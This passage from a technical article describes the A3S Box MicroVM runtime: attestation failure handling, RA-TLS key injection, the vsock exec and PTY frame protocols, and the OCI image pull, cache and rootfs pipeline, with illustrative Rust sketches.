&lt;p&gt;Re-attestation state tracking includes: startup time, last success time, last check time, consecutive failure count, and total check count. When the consecutive failure count reaches the threshold, the system takes the configured action:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Warn&lt;/strong&gt;: Log warning and emit event&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Event&lt;/strong&gt;: Send security event to event bus&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stop&lt;/strong&gt;: Stop the MicroVM&lt;/li&gt;
&lt;/ul&gt;
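&lt;p&gt;The threshold logic can be sketched as follows; &lt;code&gt;ReattestState&lt;/code&gt; and &lt;code&gt;FailureAction&lt;/code&gt; are illustrative names, not the actual API:&lt;/p&gt;

```rust
#[derive(Debug, PartialEq)]
pub enum FailureAction {
    Warn,
    Event,
    Stop,
}

/// Minimal sketch of the consecutive-failure counter described above.
pub struct ReattestState {
    pub consecutive_failures: u32,
    pub max_failures: u32,
    pub action: FailureAction,
}

impl ReattestState {
    /// A successful attestation resets the streak.
    pub fn record_success(&mut self) {
        self.consecutive_failures = 0;
    }

    /// A failure increments the streak; once it reaches the threshold,
    /// return the configured action for the caller to execute.
    pub fn record_failure(&mut self) -> Option<&FailureAction> {
        self.consecutive_failures += 1;
        if self.consecutive_failures >= self.max_failures {
            Some(&self.action)
        } else {
            None
        }
    }
}
```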

&lt;h3&gt;
  
  
  10.4 Key Injection Flow
&lt;/h3&gt;

&lt;p&gt;In a TEE environment, keys cannot be passed through ordinary environment variables or file mounts (because the host is untrusted). A3S Box implements secure key injection via RA-TLS:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;After the MicroVM starts, the Attestation server listens on vsock port 4091&lt;/li&gt;
&lt;li&gt;The Key Broker Service (KBS) connects to the MicroVM via RA-TLS&lt;/li&gt;
&lt;li&gt;During the TLS handshake, the MicroVM's certificate contains the SNP attestation report&lt;/li&gt;
&lt;li&gt;KBS verifies the attestation report (measurement, TCB version, policy compliance)&lt;/li&gt;
&lt;li&gt;After verification passes, KBS sends keys through the encrypted channel&lt;/li&gt;
&lt;li&gt;Guest Init writes keys to &lt;code&gt;/run/secrets/&lt;/code&gt; (tmpfs, permissions 0400)&lt;/li&gt;
&lt;li&gt;Application processes read keys from &lt;code&gt;/run/secrets/&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Throughout the entire process, keys never appear in plaintext outside the MicroVM.&lt;/p&gt;




&lt;h2&gt;
  
  
  11. Vsock Communication Protocol: The Bridge Between Host and Guest
&lt;/h2&gt;

&lt;h3&gt;
  
  
  11.1 Why Vsock?
&lt;/h3&gt;

&lt;p&gt;In a MicroVM architecture, an efficient communication channel is needed between the host and guest. The candidate options are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Network (TCP/IP)&lt;/strong&gt;: Requires configuring virtual network interfaces, adding complexity and attack surface&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Shared memory&lt;/strong&gt;: High performance but difficult to implement securely&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Serial port&lt;/strong&gt;: Simple but extremely low bandwidth&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;vsock (Virtio Socket)&lt;/strong&gt;: A socket interface designed specifically for VM communication, requiring no network configuration&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Advantages of vsock:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Zero configuration&lt;/strong&gt;: No IP addresses, routing tables, or firewall rules needed&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secure&lt;/strong&gt;: The communication channel does not go through the network stack and cannot be intercepted by network-layer attackers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;High performance&lt;/strong&gt;: virtio-based shared memory transport with extremely low latency&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Simple&lt;/strong&gt;: Uses standard socket API (&lt;code&gt;AF_VSOCK&lt;/code&gt;), programming model similar to TCP&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  11.2 Port Allocation
&lt;/h3&gt;

&lt;p&gt;A3S Box allocates four dedicated ports on vsock:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Port&lt;/th&gt;
&lt;th&gt;Service&lt;/th&gt;
&lt;th&gt;Direction&lt;/th&gt;
&lt;th&gt;Protocol&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;4088&lt;/td&gt;
&lt;td&gt;gRPC Agent control&lt;/td&gt;
&lt;td&gt;Bidirectional&lt;/td&gt;
&lt;td&gt;Protobuf&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4089&lt;/td&gt;
&lt;td&gt;Exec server&lt;/td&gt;
&lt;td&gt;Host-&amp;gt;Guest&lt;/td&gt;
&lt;td&gt;JSON + binary frames&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4090&lt;/td&gt;
&lt;td&gt;PTY server&lt;/td&gt;
&lt;td&gt;Bidirectional&lt;/td&gt;
&lt;td&gt;Binary frames&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4091&lt;/td&gt;
&lt;td&gt;Attestation server&lt;/td&gt;
&lt;td&gt;Host-&amp;gt;Guest&lt;/td&gt;
&lt;td&gt;RA-TLS&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  11.3 Binary Frame Protocol
&lt;/h3&gt;

&lt;p&gt;Exec and PTY servers use a unified binary frame format:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;+----------+--------------+---------------------+
| type: u8 | length: u32  | payload: [u8; len]  |
| (1 byte) | (4 bytes BE) | (variable length)   |
+----------+--------------+---------------------+
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Maximum frame payload is 64 KiB. This limit is a deliberate tradeoff: large enough to efficiently transfer data, yet small enough to avoid memory pressure.&lt;/p&gt;
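&lt;p&gt;A minimal encoder/decoder for this frame layout might look like the following — a sketch, not the production code:&lt;/p&gt;

```rust
/// Frame layout described above: 1-byte type,
/// 4-byte big-endian length, then the payload.
pub const MAX_PAYLOAD: usize = 64 * 1024; // 64 KiB cap

pub fn encode_frame(frame_type: u8, payload: &[u8]) -> Option<Vec<u8>> {
    if payload.len() > MAX_PAYLOAD {
        return None; // oversized frames are rejected
    }
    let mut buf = Vec::with_capacity(5 + payload.len());
    buf.push(frame_type);
    buf.extend_from_slice(&(payload.len() as u32).to_be_bytes());
    buf.extend_from_slice(payload);
    Some(buf)
}

pub fn decode_frame(buf: &[u8]) -> Option<(u8, &[u8])> {
    if buf.len() < 5 {
        return None; // header incomplete
    }
    let len = u32::from_be_bytes([buf[1], buf[2], buf[3], buf[4]]) as usize;
    if len > MAX_PAYLOAD || buf.len() < 5 + len {
        return None; // oversized or truncated payload
    }
    Some((buf[0], &buf[5..5 + len]))
}
```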

&lt;h3&gt;
  
  
  11.4 Exec Protocol in Detail
&lt;/h3&gt;

&lt;p&gt;The Exec protocol supports two modes:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Non-streaming mode&lt;/strong&gt;: For short commands (e.g., &lt;code&gt;cat /etc/hostname&lt;/code&gt;)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Host --&amp;gt; [ExecRequest JSON] --&amp;gt; Guest
Host &amp;lt;-- [ExecOutput JSON]  &amp;lt;-- Guest

ExecRequest {
    cmd: ["cat", "/etc/hostname"],
    timeout_ns: 5_000_000_000,  // 5 seconds
    env: {"KEY": "VALUE"},
    working_dir: "/app",
    user: "nobody",
    streaming: false
}

ExecOutput {
    stdout: "my-hostname\n",
    stderr: "",
    exit_code: 0
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In non-streaming mode, each stream (stdout/stderr) is capped at 16 MiB of collected output.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Streaming mode&lt;/strong&gt;: For long-running commands or scenarios requiring real-time output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Host --&amp;gt; [ExecRequest JSON, streaming: true] --&amp;gt; Guest
Host &amp;lt;-- [ExecChunk: type=0x01, Stdout]       &amp;lt;-- Guest
Host &amp;lt;-- [ExecChunk: type=0x01, Stderr]       &amp;lt;-- Guest
Host &amp;lt;-- [ExecChunk: type=0x01, Stdout]       &amp;lt;-- Guest
...
Host &amp;lt;-- [ExecExit: type=0x02, exit_code]     &amp;lt;-- Guest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Streaming mode also supports file transfer:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;FileRequest {
    op: Upload | Download,
    guest_path: "/data/file.txt",
    data: "base64_encoded_content"  // for Upload
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  11.5 PTY Protocol in Detail
&lt;/h3&gt;

&lt;p&gt;The PTY protocol is designed for interactive terminal sessions, supporting full terminal emulation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Frame types:
  0x01 - Request  (Host-&amp;gt;Guest: start PTY session)
  0x02 - Data     (Bidirectional: terminal data)
  0x03 - Resize   (Host-&amp;gt;Guest: terminal window size change)
  0x04 - Exit     (Guest-&amp;gt;Host: process exit)
  0x05 - Error    (Guest-&amp;gt;Host: error message)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
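&lt;p&gt;The frame types above can be modeled as a small enum with a fallible conversion from the wire byte (illustrative names):&lt;/p&gt;

```rust
/// The five PTY frame types from the protocol table above.
#[derive(Debug, PartialEq, Clone, Copy)]
pub enum PtyFrameType {
    Request = 0x01,
    Data = 0x02,
    Resize = 0x03,
    Exit = 0x04,
    Error = 0x05,
}

/// Map a wire byte to a frame type; unknown bytes are rejected
/// rather than silently ignored.
pub fn parse_frame_type(byte: u8) -> Option<PtyFrameType> {
    match byte {
        0x01 => Some(PtyFrameType::Request),
        0x02 => Some(PtyFrameType::Data),
        0x03 => Some(PtyFrameType::Resize),
        0x04 => Some(PtyFrameType::Exit),
        0x05 => Some(PtyFrameType::Error),
        _ => None,
    }
}
```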



&lt;p&gt;PTY session establishment flow:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Host sends &lt;code&gt;PtyRequest&lt;/code&gt; (containing command, environment variables, initial window size)&lt;/li&gt;
&lt;li&gt;Guest Init calls &lt;code&gt;openpty()&lt;/code&gt; to allocate a PTY pair&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;fork()&lt;/code&gt; creates a child process:

&lt;ul&gt;
&lt;li&gt;Child process: &lt;code&gt;setsid()&lt;/code&gt; -&amp;gt; set controlling terminal -&amp;gt; redirect stdio -&amp;gt; &lt;code&gt;execvp()&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Parent process: bidirectional data forwarding between vsock and PTY master via &lt;code&gt;poll()&lt;/code&gt; multiplexing&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Terminal window size changes are passed via &lt;code&gt;TIOCSWINSZ&lt;/code&gt; ioctl&lt;/li&gt;
&lt;li&gt;When the child process exits, drain the PTY buffer and send a &lt;code&gt;PtyExit&lt;/code&gt; frame&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This design makes the &lt;code&gt;a3s-box exec -it my-app /bin/bash&lt;/code&gt; experience identical to &lt;code&gt;docker exec -it&lt;/code&gt; — supporting Tab completion, arrow key history, Ctrl+C signal forwarding, window size adaptation, and all other terminal features.&lt;/p&gt;




&lt;h2&gt;
  
  
  12. OCI Image Processing Pipeline: From Registry to Root Filesystem
&lt;/h2&gt;

&lt;h3&gt;
  
  
  12.1 The Complete Image Pull Chain
&lt;/h3&gt;

&lt;p&gt;OCI (Open Container Initiative) images are the universal language of the container ecosystem. A3S Box fully implements the OCI image specification, allowing any standards-compliant container image to run directly in a MicroVM.&lt;/p&gt;

&lt;p&gt;The complete image pull flow:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;User request (a3s-box pull nginx:latest)
    |
    v
ImageReference parsing
    |  registry: registry-1.docker.io
    |  repository: library/nginx
    |  tag: latest
    |
    v
ImagePuller (cache-first strategy)
    |
    +-- Cache hit? --&amp;gt; Return local path directly
    |       |
    |       +-- Lookup by reference (tag match)
    |       +-- Lookup by digest (content dedup)
    |
    +-- Cache miss --&amp;gt; RegistryPuller
                    |
                    +-- Authentication (RegistryAuth)
                    |   +-- Anonymous
                    |   +-- Basic (username/password)
                    |   +-- Environment variables (REGISTRY_USERNAME/PASSWORD)
                    |   +-- CredentialStore (Docker config.json)
                    |
                    +-- Multi-arch resolution (linux_platform_resolver)
                    |   +-- x86_64 -&amp;gt; amd64
                    |   +-- aarch64 -&amp;gt; arm64
                    |
                    +-- Pull manifest + config + layers
                    |
                    +-- Store in ImageStore
                        +-- Capacity eviction (LRU)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  12.2 Image Reference Parsing
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;ImageReference&lt;/code&gt; is the core type for image identification, responsible for parsing various user input formats into a standardized structure:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ImageReference&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;registry&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;       &lt;span class="c1"&gt;// e.g., "registry-1.docker.io"&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;repository&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;     &lt;span class="c1"&gt;// e.g., "library/nginx"&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;tag&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c1"&gt;// e.g., "latest"&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;digest&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;// e.g., "sha256:abc..."&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Parsing rules are compatible with Docker conventions:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;nginx&lt;/code&gt; -&amp;gt; &lt;code&gt;registry-1.docker.io/library/nginx:latest&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;myuser/myapp:v2&lt;/code&gt; -&amp;gt; &lt;code&gt;registry-1.docker.io/myuser/myapp:v2&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;ghcr.io/org/tool:main&lt;/code&gt; -&amp;gt; kept as-is&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;registry.example.com/app@sha256:abc...&lt;/code&gt; -&amp;gt; digest reference&lt;/li&gt;
&lt;/ul&gt;
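&lt;p&gt;A simplified normalizer for these rules might look like the sketch below. The function name &lt;code&gt;normalize&lt;/code&gt; is hypothetical; the real parser returns a structured &lt;code&gt;ImageReference&lt;/code&gt; and validates characters, while here tag and digest are merged into one reference suffix for brevity:&lt;/p&gt;

```rust
/// Normalize a Docker-style image reference into
/// (registry, repository, tag-or-digest suffix).
pub fn normalize(input: &str) -> (String, String, String) {
    // Split off a digest or tag suffix first.
    let (name, suffix) = if let Some((n, d)) = input.split_once('@') {
        (n.to_string(), d.to_string())
    } else if let Some((n, t)) = input.rsplit_once(':') {
        // A ':' after the last '/' is a tag; otherwise it belongs to a host:port.
        if t.contains('/') {
            (input.to_string(), "latest".to_string())
        } else {
            (n.to_string(), t.to_string())
        }
    } else {
        (input.to_string(), "latest".to_string())
    };

    // A first path component containing '.' or ':' (or "localhost")
    // is treated as a registry host, per Docker convention.
    let parts: Vec<&str> = name.splitn(2, '/').collect();
    let (registry, repo) = if parts.len() == 2
        && (parts[0].contains('.') || parts[0].contains(':') || parts[0] == "localhost")
    {
        (parts[0].to_string(), parts[1].to_string())
    } else {
        ("registry-1.docker.io".to_string(), name.clone())
    };

    // Docker Hub single-name images live under "library/".
    let repo = if registry == "registry-1.docker.io" && !repo.contains('/') {
        format!("library/{repo}")
    } else {
        repo
    };
    (registry, repo, suffix)
}
```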

&lt;h3&gt;
  
  
  12.3 Multi-Architecture Image Resolution
&lt;/h3&gt;

&lt;p&gt;Modern container images are typically multi-architecture — the same tag contains variants for multiple platforms like amd64 and arm64. A3S Box's &lt;code&gt;linux_platform_resolver&lt;/code&gt; automatically selects the variant matching the host architecture:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;OS is fixed to &lt;code&gt;linux&lt;/code&gt; (MicroVM always runs a Linux kernel internally)&lt;/li&gt;
&lt;li&gt;Architecture mapping: &lt;code&gt;x86_64&lt;/code&gt; -&amp;gt; &lt;code&gt;amd64&lt;/code&gt;, &lt;code&gt;aarch64&lt;/code&gt; -&amp;gt; &lt;code&gt;arm64&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This means even when developing on an Apple Silicon Mac, A3S Box will automatically pull the arm64 variant of the image.&lt;/p&gt;
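&lt;p&gt;The mapping itself fits in a few lines; in practice the host architecture would come from something like &lt;code&gt;std::env::consts::ARCH&lt;/code&gt;:&lt;/p&gt;

```rust
/// Sketch of the platform resolution above: OS is pinned to "linux",
/// and the host architecture is mapped to its OCI name.
pub fn oci_platform(host_arch: &str) -> Option<(&'static str, &'static str)> {
    let arch = match host_arch {
        "x86_64" => "amd64",
        "aarch64" => "arm64",
        _ => return None, // unsupported host architecture
    };
    Some(("linux", arch))
}
```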

&lt;h3&gt;
  
  
  12.4 Caching and Deduplication
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;ImageStore&lt;/code&gt; implements two-level cache lookup:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Lookup by reference&lt;/strong&gt;: Exact match on &lt;code&gt;registry/repository:tag&lt;/code&gt;, for repeated pulls of the same image&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lookup by digest&lt;/strong&gt;: Deduplication via SHA-256 content hash, avoiding duplicate storage when different tags point to the same content&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Cache configuration (&lt;code&gt;CacheConfig&lt;/code&gt;):&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Default&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;enabled&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;true&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Whether to enable caching&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;cache_dir&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;~/.a3s/cache&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Cache directory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;max_rootfs_entries&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;10&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Maximum rootfs cache entries&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;max_cache_bytes&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;10 GB&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Maximum total cache size&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;When the cache exceeds either limit, entries are evicted in LRU (Least Recently Used) order.&lt;/p&gt;
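&lt;p&gt;A minimal LRU eviction sketch under both limits (illustrative names and a linear-scan structure; a production cache would also persist last-access times on disk):&lt;/p&gt;

```rust
use std::collections::VecDeque;

/// Entries are kept in recency order and evicted from the cold end
/// when either the entry-count or byte budget is exceeded.
pub struct RootfsCache {
    entries: VecDeque<(String, u64)>, // (digest, size_bytes), most recent at the back
    max_entries: usize,
    max_bytes: u64,
}

impl RootfsCache {
    pub fn new(max_entries: usize, max_bytes: u64) -> Self {
        Self { entries: VecDeque::new(), max_entries, max_bytes }
    }

    fn total_bytes(&self) -> u64 {
        self.entries.iter().map(|(_, size)| *size).sum()
    }

    /// Insert or touch an entry, then evict least-recently-used
    /// entries until both limits are satisfied. Returns the digests
    /// of evicted entries so the caller can delete them from disk.
    pub fn insert(&mut self, digest: &str, size: u64) -> Vec<String> {
        self.entries.retain(|(d, _)| d != digest); // touch = move to back
        self.entries.push_back((digest.to_string(), size));

        let mut evicted = Vec::new();
        while self.entries.len() > self.max_entries || self.total_bytes() > self.max_bytes {
            match self.entries.pop_front() {
                Some((d, _)) => evicted.push(d),
                None => break,
            }
        }
        evicted
    }
}
```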

&lt;h3&gt;
  
  
  12.5 Rootfs Construction
&lt;/h3&gt;

&lt;p&gt;From an OCI image to a root filesystem usable by a MicroVM, &lt;code&gt;OciRootfsBuilder&lt;/code&gt; performs the following steps:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Layer extraction&lt;/strong&gt;: Decompress OCI image layers in order, handling whiteout files (&lt;code&gt;.wh.&lt;/code&gt; prefix) to implement inter-layer file deletion&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Base filesystem injection&lt;/strong&gt;: Create base files required for MicroVM operation:

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;/etc/passwd&lt;/code&gt;: Contains &lt;code&gt;root&lt;/code&gt; and &lt;code&gt;nobody&lt;/code&gt; users&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/etc/group&lt;/code&gt;: Basic user groups&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/etc/hosts&lt;/code&gt;: localhost mapping&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/etc/resolv.conf&lt;/code&gt;: DNS configuration (default &lt;code&gt;8.8.8.8&lt;/code&gt;, &lt;code&gt;8.8.4.4&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/etc/nsswitch.conf&lt;/code&gt;: Name service switch configuration&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Directory structure creation&lt;/strong&gt;: Ensure &lt;code&gt;/dev&lt;/code&gt;, &lt;code&gt;/proc&lt;/code&gt;, &lt;code&gt;/sys&lt;/code&gt;, &lt;code&gt;/tmp&lt;/code&gt;, &lt;code&gt;/etc&lt;/code&gt;, &lt;code&gt;/workspace&lt;/code&gt;, &lt;code&gt;/run&lt;/code&gt; directories exist&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Guest Layout configuration&lt;/strong&gt;: Set path mappings for &lt;code&gt;workspace_dir&lt;/code&gt;, &lt;code&gt;tmp_dir&lt;/code&gt;, &lt;code&gt;run_dir&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;
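&lt;p&gt;The whiteout handling in step 1 can be sketched as a per-entry classification. The opaque marker &lt;code&gt;.wh..wh..opq&lt;/code&gt;, which clears an entire directory, is part of the OCI layer specification; the type names here are illustrative:&lt;/p&gt;

```rust
use std::path::{Path, PathBuf};

/// A layer entry named ".wh.<name>" deletes "<name>" from lower
/// layers; ".wh..wh..opq" clears the whole parent directory.
pub enum LayerAction {
    Extract(PathBuf),
    Delete(PathBuf),
    ClearDirectory(PathBuf),
}

pub fn classify_entry(entry: &Path) -> LayerAction {
    let name = entry.file_name().and_then(|n| n.to_str()).unwrap_or("");
    let parent = entry.parent().unwrap_or(Path::new("")).to_path_buf();
    if name == ".wh..wh..opq" {
        // Check the opaque marker first: it also starts with ".wh.".
        LayerAction::ClearDirectory(parent)
    } else if let Some(target) = name.strip_prefix(".wh.") {
        LayerAction::Delete(parent.join(target))
    } else {
        LayerAction::Extract(entry.to_path_buf())
    }
}
```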

&lt;h3&gt;
  
  
  12.6 Image Signature Verification
&lt;/h3&gt;

&lt;p&gt;A3S Box provides an image signature verification framework, controlling verification behavior through &lt;code&gt;SignaturePolicy&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;SignaturePolicy&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;Skip&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// Skip verification (default)&lt;/span&gt;
    &lt;span class="n"&gt;RequireSigned&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// Require signature&lt;/span&gt;
    &lt;span class="nf"&gt;Custom&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="c1"&gt;// Custom policy&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;VerifyResult&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nb"&gt;Ok&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;             &lt;span class="c1"&gt;// Signature valid&lt;/span&gt;
    &lt;span class="n"&gt;NoSignature&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c1"&gt;// No signature&lt;/span&gt;
    &lt;span class="nf"&gt;Failed&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="c1"&gt;// Verification failed&lt;/span&gt;
    &lt;span class="n"&gt;Skip&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// Verification skipped&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The default policy is &lt;code&gt;Skip&lt;/code&gt;, allowing users to use the system normally without configuring signature infrastructure. In production environments, enabling &lt;code&gt;RequireSigned&lt;/code&gt; is recommended to ensure only signature-verified images are run.&lt;/p&gt;
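&lt;p&gt;The admission decision can be sketched as a match over policy and verification result — a sketch mirroring the enums above, not the actual implementation:&lt;/p&gt;

```rust
pub enum SignaturePolicy {
    Skip,
    RequireSigned,
}

pub enum VerifyResult {
    Ok,
    NoSignature,
    Failed(String),
    Skip,
}

/// Decide whether an image may run under the given policy.
pub fn admit(policy: &SignaturePolicy, result: &VerifyResult) -> bool {
    match (policy, result) {
        // With Skip, images run regardless of signature state.
        (SignaturePolicy::Skip, _) => true,
        // With RequireSigned, only a valid signature is accepted.
        (SignaturePolicy::RequireSigned, VerifyResult::Ok) => true,
        (SignaturePolicy::RequireSigned, _) => false,
    }
}
```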

&lt;h3&gt;
  
  
  12.7 Image Pushing
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;RegistryPusher&lt;/code&gt; supports pushing locally built OCI image layouts to remote registries, returning &lt;code&gt;PushResult&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;PushResult&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
